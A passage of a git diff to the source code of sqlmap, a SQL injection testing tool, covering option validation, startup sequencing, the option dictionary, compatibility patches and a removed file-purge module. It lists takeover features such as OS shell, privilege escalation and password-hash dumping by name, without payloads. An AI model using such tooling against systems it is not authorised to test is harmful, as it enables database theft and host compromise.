conf.testParameter: + if intersect(conf.rParam, conf.testParameter): + errMsg = "option '--randomize' is incompatible with option '-p'" + raise SqlmapSyntaxException(errMsg) + if conf.mobile and conf.agent: errMsg = "switch '--mobile' is incompatible with option '--user-agent'" raise SqlmapSyntaxException(errMsg) @@ -2014,90 +2884,100 @@ def _basicOptionValidation(): errMsg = "option '--proxy' is incompatible with switch '--ignore-proxy'" raise SqlmapSyntaxException(errMsg) - if conf.forms and any([conf.logFile, conf.direct, conf.requestFile, conf.googleDork]): - errMsg = "switch '--forms' is compatible only with options '-u' (--url) and '-m'" + if conf.alert and conf.alert.startswith('-'): + errMsg = "value for option '--alert' must be valid operating system command(s)" raise SqlmapSyntaxException(errMsg) if conf.timeSec < 1: errMsg = "value for option '--time-sec' must be a positive integer" raise SqlmapSyntaxException(errMsg) - if conf.uChar and not re.match(UNION_CHAR_REGEX, conf.uChar): - errMsg = "value for option '--union-char' must be an alpha-numeric value (e.g. 
1)" + if conf.hashFile and any((conf.direct, conf.url, conf.logFile, conf.bulkFile, conf.googleDork, conf.configFile, conf.requestFile, conf.updateAll, conf.smokeTest, conf.wizard, conf.dependencies, conf.purge, conf.listTampers)): + errMsg = "option '--crack' should be used as a standalone" raise SqlmapSyntaxException(errMsg) - if isinstance(conf.uCols, basestring): + if isinstance(conf.uCols, six.string_types): if not conf.uCols.isdigit() and ("-" not in conf.uCols or len(conf.uCols.split("-")) != 2): errMsg = "value for option '--union-cols' must be a range with hyphon " errMsg += "(e.g. 1-10) or integer value (e.g. 5)" raise SqlmapSyntaxException(errMsg) - if conf.charset: - _ = checkCharEncoding(conf.charset, False) + if conf.dbmsCred and ':' not in conf.dbmsCred: + errMsg = "value for option '--dbms-cred' must be in " + errMsg += "format : (e.g. \"root:pass\")" + raise SqlmapSyntaxException(errMsg) + + if conf.encoding: + _ = checkCharEncoding(conf.encoding, False) if _ is None: - errMsg = "unknown charset '%s'. Please visit " % conf.charset + errMsg = "unknown encoding '%s'. Please visit " % conf.encoding errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE - errMsg += "supported charsets" + errMsg += "supported encodings" raise SqlmapSyntaxException(errMsg) else: - conf.charset = _ + conf.encoding = _ - if conf.loadCookies: - if not os.path.exists(conf.loadCookies): - errMsg = "cookies file '%s' does not exist" % conf.loadCookies - raise SqlmapFilePathException(errMsg) + if conf.fileWrite and not os.path.isfile(conf.fileWrite): + errMsg = "file '%s' does not exist" % os.path.abspath(conf.fileWrite) + raise SqlmapFilePathException(errMsg) + + if conf.loadCookies and not os.path.exists(conf.loadCookies): + errMsg = "cookies file '%s' does not exist" % os.path.abspath(conf.loadCookies) + raise SqlmapFilePathException(errMsg) -def _resolveCrossReferences(): - lib.core.threads.readInput = readInput - lib.core.common.getPageTemplate = getPageTemplate - lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage +def initOptions(inputOptions=AttribDict(), overrideOptions=False): + _setConfAttributes() + _setKnowledgeBaseAttributes() + _mergeOptions(inputOptions, overrideOptions) -def init(inputOptions=AttribDict(), overrideOptions=False): +def init(): """ Set attributes into both configuration and knowledge base singletons based upon command line and configuration file options. 
""" - if not inputOptions.disableColoring: - coloramainit() - - _setConfAttributes() - _setKnowledgeBaseAttributes() - _mergeOptions(inputOptions, overrideOptions) _useWizardInterface() setVerbosity() - setRestAPILog() - _saveCmdline() + _saveConfig() _setRequestFromFile() _cleanupOptions() - _purgeOutput() + _cleanupEnvironment() + _purge() _checkDependencies() + _createHomeDirectories() + _createTemporaryDirectory() _basicOptionValidation() + _setProxyList() _setTorProxySettings() _setDNSServer() _adjustLoggingFormatter() _setMultipleTargets() + _listTamperingFunctions() _setTamperingFunctions() + _setPreprocessFunctions() + _setPostprocessFunctions() _setTrafficOutputFP() - _resolveCrossReferences() + _setupHTTPCollector() + _setHttpOptions() - parseTargetUrl() parseTargetDirect() - if any((conf.url, conf.logFile, conf.bulkFile, conf.requestFile, conf.googleDork, conf.liveTest)): + if any((conf.url, conf.logFile, conf.bulkFile, conf.requestFile, conf.googleDork, conf.stdinPipe)): + _setHostname() _setHTTPTimeout() _setHTTPExtraHeaders() _setHTTPCookies() _setHTTPReferer() + _setHTTPHost() _setHTTPUserAgent() - _setHTTPMethod() _setHTTPAuthentication() - _setHTTPProxy() + _setHTTPHandlers() _setDNSCache() - _setSafeUrl() - _setGoogleDorking() + _setSocketPreConnect() + _setSafeVisit() + _doSearch() + _setStdinPipeTargets() _setBulkMultipleTargets() - _urllib2Opener() _checkTor() _setCrawler() _findPageForms() @@ -2109,6 +2989,7 @@ def init(inputOptions=AttribDict(), overrideOptions=False): _setWriteFile() _setMetasploit() _setDBMSAuthentication() + loadBoundaries() loadPayloads() _setPrefixSuffix() update() diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index d2029176982..c38e61eefde 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -1,222 +1,281 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ optDict = { - # Format: - # Family: { "parameter name": "parameter datatype" }, - # Or: - # Family: { "parameter name": ("parameter datatype", "category name used for common outputs feature") }, - "Target": { - "direct": "string", - "url": "string", - "logFile": "string", - "bulkFile": "string", - "requestFile": "string", - "sessionFile": "string", - "googleDork": "string", - "configFile": "string", - }, - - "Request": { - "data": "string", - "pDel": "string", - "cookie": "string", - "loadCookies": "string", - "dropSetCookie": "boolean", - "agent": "string", - "randomAgent": "boolean", - "rParam": "string", - "forceSSL": "boolean", - "host": "string", - "referer": "string", - "headers": "string", - "aType": "string", - "aCred": "string", - "aCert": "string", - "proxy": "string", - "pCred": "string", - "ignoreProxy": "boolean", - "delay": "float", - "timeout": "float", - "retries": "integer", - "scope": "string", - "safUrl": "string", - "saFreq": "integer", - "skipUrlEncode": "boolean", - "evalCode": "string", - }, - - "Optimization": { - "optimize": "boolean", - "predictOutput": "boolean", - "keepAlive": "boolean", - "nullConnection": "boolean", - "threads": "integer", - }, - - "Injection": { - "testParameter": "string", - "dbms": "string", - "os": "string", - "invalidBignum": "boolean", - "invalidLogical": "boolean", - "noCast": "boolean", - "noEscape": "boolean", - "prefix": "string", - "suffix": "string", - "skip": "string", - "tamper": "string", - }, - - 
"Detection": { - "level": "integer", - "risk": "integer", - "string": "string", - "notString": "string", - "regexp": "string", - "code": "integer", - "textOnly": "boolean", - "titles": "boolean", - }, - - "Techniques": { - "tech": "string", - "timeSec": "integer", - "uCols": "string", - "uChar": "string", - "dnsName": "string", - "secondOrder": "string", - }, - - "Fingerprint": { - "extensiveFp": "boolean", - }, - - "Enumeration": { - "getAll": "boolean", - "getBanner": ("boolean", "Banners"), - "getCurrentUser": ("boolean", "Users"), - "getCurrentDb": ("boolean", "Databases"), - "getHostname": "boolean", - "isDba": "boolean", - "getUsers": ("boolean", "Users"), - "getPasswordHashes": ("boolean", "Passwords"), - "getPrivileges": ("boolean", "Privileges"), - "getRoles": ("boolean", "Roles"), - "getDbs": ("boolean", "Databases"), - "getTables": ("boolean", "Tables"), - "getColumns": ("boolean", "Columns"), - "getSchema": "boolean", - "getCount": "boolean", - "dumpTable": "boolean", - "dumpAll": "boolean", - "search": "boolean", - "db": "string", - "tbl": "string", - "col": "string", - "user": "string", - "excludeSysDbs": "boolean", - "limitStart": "integer", - "limitStop": "integer", - "firstChar": "integer", - "lastChar": "integer", - "query": "string", - "sqlShell": "boolean", - "sqlFile": "string", - }, - - "Brute": { - "commonTables": "boolean", - "commonColumns": "boolean", - }, - - "User-defined function": { - "udfInject": "boolean", - "shLib": "string", - }, - - "File system": { - "rFile": "string", - "wFile": "string", - "dFile": "string", - }, - - "Takeover": { - "osCmd": "string", - "osShell": "boolean", - "osPwn": "boolean", - "osSmb": "boolean", - "osBof": "boolean", - "privEsc": "boolean", - "msfPath": "string", - "tmpPath": "string", - }, - - "Windows": { - "regRead": "boolean", - "regAdd": "boolean", - "regDel": "boolean", - "regKey": "string", - "regVal": "string", - "regData": "string", - "regType": "string", - }, - - "General": { - #"xmlFile": "string", - "trafficFile": "string", - "batch": "boolean", - "charset": "string", - "checkTor": "boolean", - "crawlDepth": "integer", - "csvDel": "string", - "dbmsCred": "string", - "dumpFormat": "string", - "eta": "boolean", - "flushSession": "boolean", - "forms": "boolean", - "freshQueries": "boolean", - "hexConvert": "boolean", - "oDir": "string", - "parseErrors": "boolean", - "saveCmdline": "boolean", - "updateAll": "boolean", - "tor": "boolean", - "torPort": "integer", - "torType": "string", - }, - - "Miscellaneous": { - "mnemonics": "string", - "alert": "string", - "answers": "string", - "beep": "boolean", - "checkPayload": "boolean", - "checkWaf": "boolean", - "cleanup": "boolean", - "dependencies": "boolean", - "disableColoring": "boolean", - "googlePage": "integer", - "hpp": "boolean", - "mobile": "boolean", - "pageRank": "boolean", - "purgeOutput": "boolean", - "smart": "boolean", - "testFilter": "string", - "wizard": "boolean", - "verbose": "integer", - }, - "Hidden": { - "profile": "boolean", - "cpuThrottle": "integer", - "forceDns": "boolean", - "smokeTest": "boolean", - "liveTest": "boolean", - "stopFail": "boolean", - "runCase": "string", - } - } + # Family: {"parameter name": "parameter datatype"}, + # --OR-- + # Family: {"parameter name": ("parameter datatype", "category name used for common outputs feature")}, + + "Target": { + "direct": "string", + "url": "string", + "logFile": "string", + "bulkFile": "string", + "requestFile": "string", + "sessionFile": "string", + "googleDork": "string", + "configFile": "string", 
+ }, + + "Request": { + "method": "string", + "data": "string", + "paramDel": "string", + "cookie": "string", + "cookieDel": "string", + "liveCookies": "string", + "loadCookies": "string", + "dropSetCookie": "boolean", + "http2": "boolean", + "agent": "string", + "mobile": "boolean", + "randomAgent": "boolean", + "host": "string", + "referer": "string", + "headers": "string", + "authType": "string", + "authCred": "string", + "authFile": "string", + "abortCode": "string", + "ignoreCode": "string", + "ignoreProxy": "boolean", + "ignoreRedirects": "boolean", + "ignoreTimeouts": "boolean", + "proxy": "string", + "proxyCred": "string", + "proxyFile": "string", + "proxyFreq": "integer", + "tor": "boolean", + "torPort": "integer", + "torType": "string", + "checkTor": "boolean", + "delay": "float", + "timeout": "float", + "retries": "integer", + "retryOn": "string", + "rParam": "string", + "safeUrl": "string", + "safePost": "string", + "safeReqFile": "string", + "safeFreq": "integer", + "skipUrlEncode": "boolean", + "csrfToken": "string", + "csrfUrl": "string", + "csrfMethod": "string", + "csrfData": "string", + "csrfRetries": "integer", + "forceSSL": "boolean", + "chunked": "boolean", + "hpp": "boolean", + "evalCode": "string", + }, + + "Optimization": { + "optimize": "boolean", + "predictOutput": "boolean", + "keepAlive": "boolean", + "nullConnection": "boolean", + "threads": "integer", + }, + + "Injection": { + "testParameter": "string", + "skip": "string", + "skipStatic": "boolean", + "paramExclude": "string", + "paramFilter": "string", + "dbms": "string", + "dbmsCred": "string", + "os": "string", + "invalidBignum": "boolean", + "invalidLogical": "boolean", + "invalidString": "boolean", + "noCast": "boolean", + "noEscape": "boolean", + "prefix": "string", + "suffix": "string", + "tamper": "string", + }, + + "Detection": { + "level": "integer", + "risk": "integer", + "string": "string", + "notString": "string", + "regexp": "string", + "code": "integer", + "smart": "boolean", + "textOnly": "boolean", + "titles": "boolean", + }, + + "Techniques": { + "technique": "string", + "timeSec": "integer", + "uCols": "string", + "uChar": "string", + "uFrom": "string", + "uValues": "string", + "dnsDomain": "string", + "secondUrl": "string", + "secondReq": "string", + }, + + "Fingerprint": { + "extensiveFp": "boolean", + }, + + "Enumeration": { + "getAll": "boolean", + "getBanner": ("boolean", "Banners"), + "getCurrentUser": ("boolean", "Users"), + "getCurrentDb": ("boolean", "Databases"), + "getHostname": "boolean", + "isDba": "boolean", + "getUsers": ("boolean", "Users"), + "getPasswordHashes": ("boolean", "Passwords"), + "getPrivileges": ("boolean", "Privileges"), + "getRoles": ("boolean", "Roles"), + "getDbs": ("boolean", "Databases"), + "getTables": ("boolean", "Tables"), + "getColumns": ("boolean", "Columns"), + "getSchema": "boolean", + "getCount": "boolean", + "dumpTable": "boolean", + "dumpAll": "boolean", + "search": "boolean", + "getComments": "boolean", + "getStatements": "boolean", + "db": "string", + "tbl": "string", + "col": "string", + "exclude": "string", + "pivotColumn": "string", + "dumpWhere": "string", + "user": "string", + "excludeSysDbs": "boolean", + "limitStart": "integer", + "limitStop": "integer", + "firstChar": "integer", + "lastChar": "integer", + "sqlQuery": "string", + "sqlShell": "boolean", + "sqlFile": "string", + }, + + "Brute": { + "commonTables": "boolean", + "commonColumns": "boolean", + "commonFiles": "boolean", + }, + + "User-defined function": { + "udfInject": 
"boolean", + "shLib": "string", + }, + + "File system": { + "fileRead": "string", + "fileWrite": "string", + "fileDest": "string", + }, + + "Takeover": { + "osCmd": "string", + "osShell": "boolean", + "osPwn": "boolean", + "osSmb": "boolean", + "osBof": "boolean", + "privEsc": "boolean", + "msfPath": "string", + "tmpPath": "string", + }, + + "Windows": { + "regRead": "boolean", + "regAdd": "boolean", + "regDel": "boolean", + "regKey": "string", + "regVal": "string", + "regData": "string", + "regType": "string", + }, + + "General": { + "trafficFile": "string", + "abortOnEmpty": "boolean", + "answers": "string", + "batch": "boolean", + "base64Parameter": "string", + "base64Safe": "boolean", + "binaryFields": "string", + "charset": "string", + "checkInternet": "boolean", + "cleanup": "boolean", + "crawlDepth": "integer", + "crawlExclude": "string", + "csvDel": "string", + "dumpFile": "string", + "dumpFormat": "string", + "encoding": "string", + "eta": "boolean", + "flushSession": "boolean", + "forms": "boolean", + "freshQueries": "boolean", + "googlePage": "integer", + "harFile": "string", + "hexConvert": "boolean", + "outputDir": "string", + "parseErrors": "boolean", + "postprocess": "string", + "preprocess": "string", + "repair": "boolean", + "saveConfig": "string", + "scope": "string", + "skipHeuristics": "boolean", + "skipWaf": "boolean", + "testFilter": "string", + "testSkip": "string", + "timeLimit": "float", + "unsafeNaming": "boolean", + "webRoot": "string", + }, + + "Miscellaneous": { + "alert": "string", + "beep": "boolean", + "dependencies": "boolean", + "disableColoring": "boolean", + "disableHashing": "boolean", + "listTampers": "boolean", + "noLogging": "boolean", + "noTruncate": "boolean", + "offline": "boolean", + "purge": "boolean", + "resultsFile": "string", + "tmpDir": "string", + "unstable": "boolean", + "updateAll": "boolean", + "wizard": "boolean", + "verbose": "integer", + }, + + "Hidden": { + "dummy": "boolean", + "disablePrecon": "boolean", + "profile": "boolean", + "forceDns": "boolean", + "murphyRate": "integer", + "smokeTest": "boolean", + }, + + "API": { + "api": "boolean", + "taskid": "string", + "database": "string", + } +} diff --git a/lib/core/patch.py b/lib/core/patch.py new file mode 100644 index 00000000000..bcd79982ec9 --- /dev/null +++ b/lib/core/patch.py @@ -0,0 +1,223 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import codecs +import collections +import inspect +import logging +import os +import random +import re +import sys + +import lib.controller.checks +import lib.core.common +import lib.core.convert +import lib.core.option +import lib.core.threads +import lib.request.connect +import lib.utils.search +import lib.utils.sqlalchemy +import thirdparty.ansistrm.ansistrm +import thirdparty.chardet.universaldetector + +from lib.core.common import filterNone +from lib.core.common import getSafeExString +from lib.core.common import isDigit +from lib.core.common import isListLike +from lib.core.common import readInput +from lib.core.common import shellExec +from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange +from lib.core.convert import stdoutEncode +from lib.core.data import conf +from lib.core.enums import PLACE +from lib.core.option import _setHTTPHandlers +from lib.core.option import setVerbosity +from lib.core.settings import INVALID_UNICODE_PRIVATE_AREA +from lib.core.settings import INVALID_UNICODE_CHAR_FORMAT 
+from lib.core.settings import IS_WIN +from lib.request.templates import getPageTemplate +from thirdparty import six +from thirdparty.six import unichr as _unichr +from thirdparty.six.moves import http_client as _http_client + +_rand = 0 + +def dirtyPatches(): + """ + Place for "dirty" Python related patches + """ + + # accept overly long result lines (e.g. SQLi results in HTTP header responses) + _http_client._MAXLINE = 1 * 1024 * 1024 + + # prevent double chunked encoding in case of sqlmap chunking (Note: Python3 does it automatically if 'Content-length' is missing) + if six.PY3: + if not hasattr(_http_client.HTTPConnection, "__send_output"): + _http_client.HTTPConnection.__send_output = _http_client.HTTPConnection._send_output + + def _send_output(self, *args, **kwargs): + if conf.get("chunked") and "encode_chunked" in kwargs: + kwargs["encode_chunked"] = False + self.__send_output(*args, **kwargs) + + _http_client.HTTPConnection._send_output = _send_output + + # add support for inet_pton() on Windows OS + if IS_WIN: + from thirdparty.wininetpton import win_inet_pton + + # Reference: https://github.com/nodejs/node/issues/12786#issuecomment-298652440 + codecs.register(lambda name: codecs.lookup("utf-8") if name == "cp65001" else None) + + # Reference: http://bugs.python.org/issue17849 + if hasattr(_http_client, "LineAndFileWrapper"): + def _(self, *args): + return self._readline() + + _http_client.LineAndFileWrapper._readline = _http_client.LineAndFileWrapper.readline + _http_client.LineAndFileWrapper.readline = _ + + # to prevent too much "guessing" in case of binary data retrieval + thirdparty.chardet.universaldetector.MINIMUM_THRESHOLD = 0.90 + + match = re.search(r" --method[= ](\w+)", " ".join(sys.argv)) + if match and match.group(1).upper() != PLACE.POST: + PLACE.CUSTOM_POST = PLACE.CUSTOM_POST.replace("POST", "%s (body)" % match.group(1)) + + # Reference: https://github.com/sqlmapproject/sqlmap/issues/4314 + try: + os.urandom(1) + except NotImplementedError: + if six.PY3: + os.urandom = lambda size: bytes(random.randint(0, 255) for _ in range(size)) + else: + os.urandom = lambda size: "".join(chr(random.randint(0, 255)) for _ in xrange(size)) + + # Reference: https://github.com/sqlmapproject/sqlmap/issues/5929 + try: + import collections + if not hasattr(collections, "MutableSet"): + import collections.abc + collections.MutableSet = collections.abc.MutableSet + except ImportError: + pass + + # Reference: https://github.com/sqlmapproject/sqlmap/issues/5727 + # Reference: https://stackoverflow.com/a/14076841 + try: + import pymysql + pymysql.install_as_MySQLdb() + except (ImportError, AttributeError): + pass + + # Reference: https://github.com/bottlepy/bottle/blob/df67999584a0e51ec5b691146c7fa4f3c87f5aac/bottle.py + # Reference: https://python.readthedocs.io/en/v2.7.2/library/inspect.html#inspect.getargspec + if not hasattr(inspect, "getargspec") and hasattr(inspect, "getfullargspec"): + ArgSpec = collections.namedtuple("ArgSpec", ("args", "varargs", "keywords", "defaults")) + + def makelist(data): + if isinstance(data, (tuple, list, set, dict)): + return list(data) + elif data: + return [data] + else: + return [] + + def getargspec(func): + spec = inspect.getfullargspec(func) + kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs) + return ArgSpec(kwargs, spec[1], spec[2], spec[3]) + + inspect.getargspec = getargspec + + # Installing "reversible" unicode (decoding) error handler + def _reversible(ex): + if INVALID_UNICODE_PRIVATE_AREA: + return (u"".join(_unichr(int('000f00%02x' % 
(_ if isinstance(_, int) else ord(_)), 16)) for _ in ex.object[ex.start:ex.end]), ex.end) + else: + return (u"".join(INVALID_UNICODE_CHAR_FORMAT % (_ if isinstance(_, int) else ord(_)) for _ in ex.object[ex.start:ex.end]), ex.end) + + codecs.register_error("reversible", _reversible) + + # Reference: https://github.com/sqlmapproject/sqlmap/issues/5731 + if not hasattr(logging, "_acquireLock"): + def _acquireLock(): + if logging._lock: + logging._lock.acquire() + + logging._acquireLock = _acquireLock + + if not hasattr(logging, "_releaseLock"): + def _releaseLock(): + if logging._lock: + logging._lock.release() + + logging._releaseLock = _releaseLock + +def resolveCrossReferences(): + """ + Place for cross-reference resolution + """ + + lib.core.threads.isDigit = isDigit + lib.core.threads.readInput = readInput + lib.core.common.getPageTemplate = getPageTemplate + lib.core.convert.filterNone = filterNone + lib.core.convert.isListLike = isListLike + lib.core.convert.shellExec = shellExec + lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage + lib.core.option._pympTempLeakPatch = pympTempLeakPatch + lib.request.connect.setHTTPHandlers = _setHTTPHandlers + lib.utils.search.setHTTPHandlers = _setHTTPHandlers + lib.controller.checks.setVerbosity = setVerbosity + lib.utils.sqlalchemy.getSafeExString = getSafeExString + thirdparty.ansistrm.ansistrm.stdoutEncode = stdoutEncode + +def pympTempLeakPatch(tempDir): + """ + Patch for "pymp" leaking directories inside Python3 + """ + + try: + import multiprocessing.util + multiprocessing.util.get_temp_dir = lambda: tempDir + except: + pass + +def unisonRandom(): + """ + Unifying random generated data across different Python versions + """ + + def _lcg(): + global _rand + a = 1140671485 + c = 128201163 + m = 2 ** 24 + _rand = (a * _rand + c) % m + return _rand + + def _randint(a, b): + _ = a + (_lcg() % (b - a + 1)) + return _ + + def _choice(seq): + return seq[_randint(0, len(seq) - 1)] + + def _sample(population, k): + return [_choice(population) for _ in xrange(k)] + + def _seed(seed): + global _rand + _rand = seed + + random.choice = _choice + random.randint = _randint + random.sample = _sample + random.seed = _seed diff --git a/lib/core/profiling.py b/lib/core/profiling.py index be1da3511a1..a5936beadfe 100644 --- a/lib/core/profiling.py +++ b/lib/core/profiling.py @@ -1,91 +1,29 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import codecs -import os import cProfile +import os -from lib.core.common import getUnicode from lib.core.data import logger from lib.core.data import paths -from lib.core.settings import UNICODE_ENCODING -def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): +def profile(profileOutputFile=None): """ This will run the program and present profiling data in a nice looking graph """ - try: - from thirdparty.gprof2dot import gprof2dot - from thirdparty.xdot import xdot - import gobject - import gtk - import pydot - except ImportError, e: - errMsg = "profiling requires third-party libraries (%s). 
" % getUnicode(e, UNICODE_ENCODING) - errMsg += "Quick steps:%s" % os.linesep - errMsg += "1) sudo apt-get install python-pydot python-pyparsing python-profiler graphviz" - logger.error(errMsg) - - return - if profileOutputFile is None: profileOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.raw") - if dotOutputFile is None: - dotOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.dot") - - if imageOutputFile is None: - imageOutputFile = os.path.join(paths.SQLMAP_OUTPUT_PATH, "sqlmap_profile.png") - if os.path.exists(profileOutputFile): os.remove(profileOutputFile) - if os.path.exists(dotOutputFile): - os.remove(dotOutputFile) - - if os.path.exists(imageOutputFile): - os.remove(imageOutputFile) - - infoMsg = "profiling the execution into file %s" % profileOutputFile - logger.info(infoMsg) - # Start sqlmap main function and generate a raw profile file cProfile.run("start()", profileOutputFile) - infoMsg = "converting profile data into a dot file '%s'" % dotOutputFile - logger.info(infoMsg) - - # Create dot file by using extra/gprof2dot/gprof2dot.py - # http://code.google.com/p/jrfonseca/wiki/Gprof2Dot - dotFilePointer = codecs.open(dotOutputFile, 'wt', UNICODE_ENCODING) - parser = gprof2dot.PstatsParser(profileOutputFile) - profile = parser.parse() - profile.prune(0.5 / 100.0, 0.1 / 100.0) - dot = gprof2dot.DotWriter(dotFilePointer) - dot.graph(profile, gprof2dot.TEMPERATURE_COLORMAP) - dotFilePointer.close() - - infoMsg = "converting dot file into a graph image '%s'" % imageOutputFile + infoMsg = "execution profiled and stored into file '%s' (e.g. 'gprof2dot -f pstats %s | dot -Tpng -o /tmp/sqlmap_profile.png')" % (profileOutputFile, profileOutputFile) logger.info(infoMsg) - - # Create graph image (png) by using pydot (python-pydot) - # http://code.google.com/p/pydot/ - pydotGraph = pydot.graph_from_dot_file(dotOutputFile) - pydotGraph.write_png(imageOutputFile) - - infoMsg = "displaying interactive graph with xdot library" - logger.info(infoMsg) - - # Display interactive Graphviz dot file by using extra/xdot/xdot.py - # http://code.google.com/p/jrfonseca/wiki/XDot - win = xdot.DotWindow() - win.connect('destroy', gtk.main_quit) - win.set_filter("dot") - win.open_file(dotOutputFile) - gobject.timeout_add(1000, win.update, dotOutputFile) - gtk.main() diff --git a/lib/core/purge.py b/lib/core/purge.py deleted file mode 100644 index beae7113306..00000000000 --- a/lib/core/purge.py +++ /dev/null @@ -1,78 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import random -import shutil -import stat -import string - -from lib.core.data import logger - -def purge(directory): - """ - Safely removes content from a given directory - """ - - if not os.path.isdir(directory): - warnMsg = "skipping purging of directory '%s' as it does not exist" % directory - logger.warn(warnMsg) - return - - infoMsg = "purging content of directory ('%s'). 
Please wait as this could take a while" % directory - logger.info(infoMsg) - - filepaths = [] - dirpaths = [] - - for rootpath, directories, filenames in os.walk(directory): - dirpaths.extend([os.path.abspath(os.path.join(rootpath, _)) for _ in directories]) - filepaths.extend([os.path.abspath(os.path.join(rootpath, _)) for _ in filenames]) - - logger.debug("changing file attributes...") - for filepath in filepaths: - try: - os.chmod(filepath, stat.S_IREAD | stat.S_IWRITE) - except: - pass - - logger.debug("writing random data to files...") - for filepath in filepaths: - try: - filesize = os.path.getsize(filepath) - with open(filepath, 'w+b') as f: - f.write("".join(chr(random.randint(0, 255)) for _ in xrange(filesize))) - except: - pass - - logger.debug("truncating files...") - for filepath in filepaths: - try: - with open(filepath, 'w') as f: - pass - except: - pass - - logger.debug("renaming filenames to random values...") - for filepath in filepaths: - try: - os.rename(filepath, os.path.join(os.path.dirname(filepath), "".join(random.sample(string.letters, random.randint(4, 8))))) - except: - pass - - dirpaths.sort(cmp=lambda x, y: y.count(os.path.sep) - x.count(os.path.sep)) - - logger.debug("renaming directory names to random values...") - for dirpath in dirpaths: - try: - os.rename(dirpath, os.path.join(os.path.dirname(dirpath), "".join(random.sample(string.letters, random.randint(4, 8))))) - except: - pass - - logger.debug("deleting the whole directory tree...") - os.chdir(os.path.join(directory, "..")) - shutil.rmtree(directory) diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py index 8500c9825a6..31349171be7 100644 --- a/lib/core/readlineng.py +++ b/lib/core/readlineng.py @@ -1,26 +1,25 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -from lib.core.data import logger -from lib.core.settings import IS_WIN -from lib.core.settings import PLATFORM - _readline = None - try: from readline import * import readline as _readline -except ImportError: +except: try: from pyreadline import * import pyreadline as _readline - except ImportError: + except: pass +from lib.core.data import logger +from lib.core.settings import IS_WIN +from lib.core.settings import PLATFORM + if IS_WIN and _readline: try: _outputfile = _readline.GetOutputFile() @@ -35,7 +34,7 @@ # Thanks to Boyd Waters for this patch. uses_libedit = False -if PLATFORM == 'mac' and _readline: +if PLATFORM == "mac" and _readline: import commands (status, result) = commands.getstatusoutput("otool -L %s | grep libedit" % _readline.__file__) @@ -56,9 +55,7 @@ # http://mail.python.org/pipermail/python-dev/2003-August/037845.html # has the original discussion. 
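# Note: libedit-backed readline builds (e.g. the default on macOS) may lack clear_history();
# the hasattr() check below installs a no-op fallback so the symbol is always defined for callers.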
if _readline: - try: - _readline.clear_history() - except AttributeError: + if not hasattr(_readline, "clear_history"): def clear_history(): pass diff --git a/lib/core/replication.py b/lib/core/replication.py index 4ec9a0d76e4..2474e72b52e 100644 --- a/lib/core/replication.py +++ b/lib/core/replication.py @@ -1,16 +1,20 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import sqlite3 -from extra.safe2bin.safe2bin import safechardecode +from lib.core.common import cleanReplaceUnicode +from lib.core.common import getSafeExString from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapValueException +from lib.core.settings import UNICODE_ENCODING +from lib.utils.safe2bin import safechardecode class Replication(object): """ @@ -19,12 +23,17 @@ class Replication(object): """ def __init__(self, dbpath): - self.dbpath = dbpath - self.connection = sqlite3.connect(dbpath) - self.connection.isolation_level = None - self.cursor = self.connection.cursor() - - class DataType: + try: + self.dbpath = dbpath + self.connection = sqlite3.connect(dbpath) + self.connection.isolation_level = None + self.cursor = self.connection.cursor() + except sqlite3.OperationalError as ex: + errMsg = "error occurred while opening a replication " + errMsg += "file '%s' ('%s')" % (dbpath, getSafeExString(ex)) + raise SqlmapConnectionException(errMsg) + + class DataType(object): """ Using this class we define auxiliary objects used for representing sqlite data types. @@ -39,7 +48,7 @@ def __str__(self): def __repr__(self): return "" % self - class Table: + class Table(object): """ This class defines methods used to manipulate table objects. 
""" @@ -49,11 +58,16 @@ def __init__(self, parent, name, columns=None, create=True, typeless=False): self.name = unsafeSQLIdentificatorNaming(name) self.columns = columns if create: - self.execute('DROP TABLE IF EXISTS "%s"' % self.name) - if not typeless: - self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns))) - else: - self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns))) + try: + self.execute('DROP TABLE IF EXISTS "%s"' % self.name) + if not typeless: + self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns))) + else: + self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns))) + except Exception as ex: + errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, 